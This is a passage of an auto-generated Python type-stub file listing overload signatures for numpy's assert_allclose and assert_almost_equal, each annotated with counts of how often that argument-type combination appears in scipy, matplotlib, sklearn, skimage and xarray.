usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: scipy.stats.mstats_basic.Ttest_relResult,
desired: scipy.stats.stats.Ttest_relResult,
atol: float,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: scipy.stats.mstats_basic.Ttest_relResult,
desired: Tuple[int, float],
atol: float,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: scipy.stats.mstats_basic.Ttest_indResult,
desired: scipy.stats.stats.Ttest_indResult,
atol: float,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: scipy.stats.mstats_basic.Ttest_indResult,
desired: Tuple[float, float],
atol: float,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.ndarray, numpy.ndarray],
desired: Tuple[List[float], List[float]],
rtol: float,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.matrix, desired: numpy.matrix, rtol: float):
"""
usage.scipy: 3
"""
...
@overload
def assert_allclose(actual: numpy.float32, desired: numpy.float64, rtol: float):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.ma.core.MaskedArray, desired: numpy.ndarray):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.float64, desired: float, rtol: float, err_msg: str):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: float, rtol: int, atol: float):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: Tuple[
float, float, float, float, float, float, float, float, float, float
],
rtol: int,
atol: float,
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.float64, numpy.float64], desired: Tuple[float, float]
):
"""
usage.matplotlib: 9
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.float64, numpy.float64],
desired: Tuple[numpy.float64, numpy.float64],
):
"""
usage.matplotlib: 4
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
desired: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
atol: float,
):
"""
usage.matplotlib: 8
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: range):
"""
usage.matplotlib: 1
"""
...
@overload
def assert_allclose(actual: Tuple[numpy.float64, numpy.float64], desired: List[float]):
"""
usage.matplotlib: 3
"""
...
@overload
def assert_allclose(actual: Tuple[int, int], desired: Tuple[int, int], rtol: float):
"""
usage.matplotlib: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ma.core.MaskedArray, desired: numpy.ma.core.MaskedArray
):
"""
usage.matplotlib: 2
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.uint8, numpy.uint8, numpy.uint8, numpy.uint8, numpy.uint8],
desired: List[numpy.uint8],
):
"""
usage.matplotlib: 1
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[Tuple[int, int]]):
"""
usage.matplotlib: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: List[Tuple[Union[int, numpy.float64], Union[int, numpy.float64]]],
atol: float,
):
"""
usage.matplotlib: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: List[List[Union[float, int]]],
err_msg: numpy.ndarray,
):
"""
usage.matplotlib: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
desired: List[Union[int, float]],
):
"""
usage.matplotlib: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
desired: List[Union[float, int]],
):
"""
usage.matplotlib: 1
"""
...
@overload
def assert_allclose(actual: float, desired: numpy.float32, rtol: float):
"""
usage.sklearn: 7
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal[""],
):
"""
usage.sklearn: 7
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: pandas.core.frame.DataFrame):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: numpy.float64,
rtol: float,
atol: float,
err_msg: Literal[""],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["StackingClassifier"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["StackingRegressor"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["VotingRegressor"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["VotingClassifier"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(actual: List[numpy.int64], desired: List[numpy.int64]):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float32, desired: numpy.float64, rtol: float, atol: float
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(actual: numpy.float64, desired: numpy.float64, err_msg: str):
"""
usage.sklearn: 24
"""
...
@overload
def assert_allclose(actual: numpy.int64, desired: numpy.int64, err_msg: str):
"""
usage.sklearn: 16
"""
...
@overload
def assert_allclose(actual: float, desired: float, err_msg: str):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray],
desired: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray],
err_msg: str,
):
"""
usage.sklearn: 5
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray],
desired: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(actual: numpy.int64, desired: numpy.float64, err_msg: str):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[List[numpy.float64]]):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["LocalOutlierFactor"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["ARDRegression"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["AdaBoostClassifier"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["AdaBoostRegressor"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["BaggingClassifier"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["BaggingRegressor"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["BayesianRidge"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["BernoulliNB"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["CategoricalNB"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["ComplementNB"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["DummyClassifier"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["DummyRegressor"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["ElasticNet"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["ElasticNetCV"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["EllipticEnvelope"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["ExtraTreeClassifier"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["ExtraTreeRegressor"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["ExtraTreesClassifier"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["ExtraTreesRegressor"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.memmap, desired: numpy.memmap, rtol: float, atol: float, err_msg: str
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["GammaRegressor"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["GaussianNB"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["HuberRegressor"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["IsolationForest"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: float, rtol: float, atol: float, err_msg: Literal[""]
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["KNeighborsClassifier"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["KNeighborsRegressor"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["KernelRidge"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["LabelPropagation"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["LabelSpreading"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, atol: float, err_msg: Literal["Lars"]
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["LarsCV"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["Lasso"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["LassoCV"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["LassoLars"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["LassoLarsCV"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["LassoLarsIC"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["LinearRegression"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["LinearSVC"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["LinearSVR"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["LogisticRegression"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["LogisticRegressionCV"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["MLPClassifier"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["MLPRegressor"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["MultiOutputRegressor"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["MultiTaskElasticNet"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["MultiTaskLasso"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["MultiTaskLassoCV"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["MultinomialNB"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["NearestCentroid"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["NuSVC"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["NuSVR"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["OneClassSVM"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["OneVsOneClassifier"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["OneVsRestClassifier"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["OutputCodeClassifier"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["PLSCanonical"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["PLSRegression"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["Perceptron"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["PoissonRegressor"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["RANSACRegressor"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, atol: float, err_msg: Literal["RFE"]
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["RFECV"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["RegressorChain"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["Ridge"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["RidgeCV"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["RidgeClassifier"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["RidgeClassifierCV"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["SGDClassifier"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["SGDRegressor"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, atol: float, err_msg: Literal["SVC"]
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, atol: float, err_msg: Literal["SVR"]
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["TheilSenRegressor"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["TweedieRegressor"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["solver svd"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["solver lsqr"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["solver eigen"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: numpy.ndarray, atol: int):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float, float, float],
desired: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
rtol: float,
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["estimator_name"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[numpy.ndarray], atol: float):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: List[List[int]],
desired: List[List[int]],
rtol: float,
atol: float,
err_msg: Literal[""],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: pandas.core.frame.DataFrame,
desired: pandas.core.frame.DataFrame,
rtol: float,
atol: float,
err_msg: Literal[""],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: List[int],
desired: List[int],
rtol: float,
atol: float,
err_msg: Literal[""],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: pandas.core.series.Series,
desired: pandas.core.series.Series,
rtol: float,
atol: float,
err_msg: Literal[""],
):
"""
usage.sklearn: 1
"""
...
# Final (non-@overload) fallback signature for assert_allclose. This appears to
# be the catch-all aggregating every recorded call: parameter types are the
# union of all observed argument types, defaults are elided as `...`, and the
# usage counts below are per-package totals across all overloads above.
def assert_allclose(
    actual: object,
    desired: object,
    rtol: Union[int, float, numpy.float64, bool] = ...,
    # NOTE(review): numpy.float128 is platform-dependent (absent on Windows /
    # MSVC builds of numpy) -- presumably this was recorded on a Linux host;
    # confirm portability before reusing this annotation elsewhere.
    atol: Union[int, float, numpy.float64, numpy.float32, numpy.float128] = ...,
    err_msg: Union[
        str, Tuple[Union[complex, int, float, numpy.float64], ...], float, numpy.ndarray
    ] = ...,
    verbose: bool = ...,
):
    """
    usage.matplotlib: 184
    usage.scipy: 4705
    usage.skimage: 158
    usage.sklearn: 760
    usage.xarray: 38
    """
    ...
# Auto-recorded overload for numpy.testing.assert_almost_equal. The docstring
# is generated usage data: each "usage.<package>: N" line counts how many times
# this argument-type combination (numpy.float64 vs. int, no `decimal`) was
# observed in the named package. Do not edit by hand.
@overload
def assert_almost_equal(actual: numpy.float64, desired: int):
    """
    usage.scipy: 41
    usage.skimage: 7
    usage.sklearn: 141
    """
    ...
@overload
def assert_almost_equal(actual: numpy.float64, desired: float):
"""
usage.matplotlib: 8
usage.scipy: 173
usage.skimage: 47
usage.sklearn: 189
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: numpy.ndarray, decimal: int):
"""
usage.scipy: 43
usage.skimage: 15
usage.sklearn: 77
"""
...
@overload
def assert_almost_equal(actual: numpy.float64, desired: float, decimal: int):
"""
usage.matplotlib: 3
usage.scipy: 164
usage.skimage: 35
usage.sklearn: 109
"""
...
@overload
def assert_almost_equal(actual: numpy.float64, desired: numpy.float64, decimal: int):
"""
usage.scipy: 64
usage.skimage: 6
usage.sklearn: 47
"""
...
@overload
def assert_almost_equal(actual: numpy.float16, desired: float, decimal: int):
"""
usage.skimage: 2
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: numpy.ndarray):
"""
usage.matplotlib: 23
usage.scipy: 205
usage.skimage: 116
usage.sklearn: 127
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: int, decimal: int):
"""
usage.skimage: 1
usage.sklearn: 3
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: List[int], decimal: int):
"""
usage.scipy: 1
usage.skimage: 1
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: numpy.float64, decimal: int):
"""
usage.scipy: 3
usage.skimage: 1
usage.sklearn: 8
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: Tuple[int, int]):
"""
usage.skimage: 12
"""
...
@overload
def assert_almost_equal(actual: numpy.float64, desired: int, decimal: int):
"""
usage.scipy: 10
usage.skimage: 5
usage.sklearn: 10
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: List[float]):
"""
usage.scipy: 19
usage.skimage: 2
usage.sklearn: 3
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: List[int]):
"""
usage.scipy: 46
usage.skimage: 1
usage.sklearn: 6
"""
...
@overload
def assert_almost_equal(actual: numpy.float64, desired: numpy.float64):
"""
usage.matplotlib: 2
usage.scipy: 67
usage.skimage: 21
usage.sklearn: 131
"""
...
@overload
def assert_almost_equal(
actual: Tuple[int, int, int],
desired: Tuple[numpy.float64, numpy.float64, numpy.float64],
decimal: int,
):
"""
usage.skimage: 1
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: int):
"""
usage.scipy: 6
usage.skimage: 5
usage.sklearn: 2
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: numpy.float64):
"""
usage.scipy: 5
usage.skimage: 1
usage.sklearn: 9
"""
...
@overload
def assert_almost_equal(actual: Tuple[int, int], desired: List[float], decimal: int):
"""
usage.skimage: 1
"""
...
@overload
def assert_almost_equal(
actual: Tuple[int, int, int],
desired: Tuple[numpy.float64, numpy.float64, numpy.float64],
):
"""
usage.skimage: 1
"""
...
@overload
def assert_almost_equal(actual: numpy.int64, desired: numpy.int64):
"""
usage.skimage: 2
usage.sklearn: 2
"""
...
@overload
def assert_almost_equal(
actual: Tuple[int, int, int, int], desired: Tuple[int, int, int, int]
):
"""
usage.skimage: 1
"""
...
@overload
def assert_almost_equal(actual: int, desired: int):
"""
usage.scipy: 1
usage.skimage: 3
usage.sklearn: 2
"""
...
@overload
def assert_almost_equal(
actual: Tuple[numpy.float64, numpy.float64],
desired: Tuple[numpy.float64, numpy.float64],
):
"""
usage.skimage: 1
"""
...
@overload
def assert_almost_equal(actual: float, desired: float):
"""
usage.matplotlib: 1
usage.scipy: 42
usage.skimage: 16
usage.sklearn: 33
"""
...
@overload
def assert_almost_equal(actual: List[numpy.float64], desired: List[numpy.float64]):
"""
usage.skimage: 2
"""
...
# NOTE(review): `slice[int, int, int]` is only subscriptable at *runtime* on
# Python >= 3.12; in a .pyi stub, or under `from __future__ import annotations`,
# type checkers accept it on older versions -- confirm this file is consumed as
# a stub (never imported and evaluated) before targeting Python < 3.12.
@overload
def assert_almost_equal(
    actual: Tuple[slice[int, int, int], slice[int, int, int]],
    desired: Tuple[slice[int, int, int], slice[int, int, int]],
):
    """
    usage.skimage: 1
    """
    ...
...
@overload
def assert_almost_equal(
actual: Tuple[int, int, int, int, int, int],
desired: Tuple[int, int, int, int, int, int],
):
"""
usage.skimage: 1
"""
...
@overload
def assert_almost_equal(
actual: Tuple[numpy.float64, numpy.float64, numpy.float64],
desired: Tuple[numpy.float64, numpy.float64, numpy.float64],
):
"""
usage.skimage: 1
"""
...
@overload
def assert_almost_equal(actual: numpy.uint8, desired: numpy.uint8):
"""
usage.skimage: 1
"""
...
@overload
def assert_almost_equal(
actual: Tuple[slice[int, int, int], slice[int, int, int], slice[int, int, int]],
desired: Tuple[slice[int, int, int], slice[int, int, int], slice[int, int, int]],
):
"""
usage.skimage: 1
"""
...
@overload
def assert_almost_equal(actual: numpy.int64, desired: int):
"""
usage.skimage: 2
"""
...
@overload
def assert_almost_equal(actual: float, desired: numpy.float64, decimal: int):
"""
usage.scipy: 13
usage.skimage: 3
usage.sklearn: 4
"""
...
@overload
def assert_almost_equal(actual: float, desired: int):
"""
usage.scipy: 6
usage.skimage: 8
usage.sklearn: 10
"""
...
@overload
def assert_almost_equal(actual: Tuple[float, float], desired: Tuple[float, float]):
"""
usage.matplotlib: 1
usage.scipy: 1
usage.skimage: 3
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: List[Union[int, float]]):
"""
usage.scipy: 7
usage.skimage: 2
usage.sklearn: 1
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: List[List[int]]):
"""
usage.skimage: 4
usage.sklearn: 1
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: float):
"""
usage.matplotlib: 4
usage.scipy: 17
usage.sklearn: 5
"""
...
@overload
def assert_almost_equal(actual: float, desired: numpy.float64):
"""
usage.scipy: 9
usage.sklearn: 9
"""
...
@overload
def assert_almost_equal(actual: numpy.int64, desired: numpy.ndarray):
"""
usage.scipy: 4
usage.sklearn: 1
"""
...
@overload
def assert_almost_equal(actual: complex, desired: complex):
"""
usage.scipy: 3
"""
...
@overload
def assert_almost_equal(actual: float, desired: numpy.ndarray):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(actual: numpy.float32, desired: numpy.float32):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(actual: numpy.complex64, desired: numpy.complex64):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(actual: numpy.complex128, desired: numpy.complex128):
"""
usage.scipy: 2
"""
...
@overload
def assert_almost_equal(actual: numpy.float64, desired: numpy.complex128):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(actual: float, desired: numpy.float32, decimal: int):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(actual: numpy.int64, desired: float):
"""
usage.scipy: 10
usage.sklearn: 1
"""
...
@overload
def assert_almost_equal(actual: numpy.uint64, desired: float):
"""
usage.scipy: 9
"""
...
@overload
def assert_almost_equal(actual: numpy.float32, desired: float):
"""
usage.scipy: 9
"""
...
@overload
def assert_almost_equal(actual: numpy.int8, desired: float):
"""
usage.scipy: 4
"""
...
@overload
def assert_almost_equal(actual: numpy.uint8, desired: float):
"""
usage.scipy: 4
"""
...
@overload
def assert_almost_equal(actual: numpy.int16, desired: float):
"""
usage.scipy: 4
"""
...
@overload
def assert_almost_equal(actual: numpy.uint16, desired: float):
"""
usage.scipy: 4
"""
...
@overload
def assert_almost_equal(actual: numpy.int32, desired: float):
"""
usage.scipy: 4
"""
...
@overload
def assert_almost_equal(actual: numpy.uint32, desired: float):
"""
usage.scipy: 4
"""
...
@overload
def assert_almost_equal(actual: numpy.bool_, desired: float):
"""
usage.scipy: 2
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: float, decimal: int):
"""
usage.scipy: 10
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: Tuple[float, float]):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(actual: numpy.ndarray, desired: List[float], decimal: int):
"""
usage.scipy: 21
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray, desired: List[Union[float, int]], decimal: int
):
"""
usage.scipy: 1
"""
...
@overload
def assert_almost_equal(
actual: numpy.ndarray,
desired: numpy.ndarray,
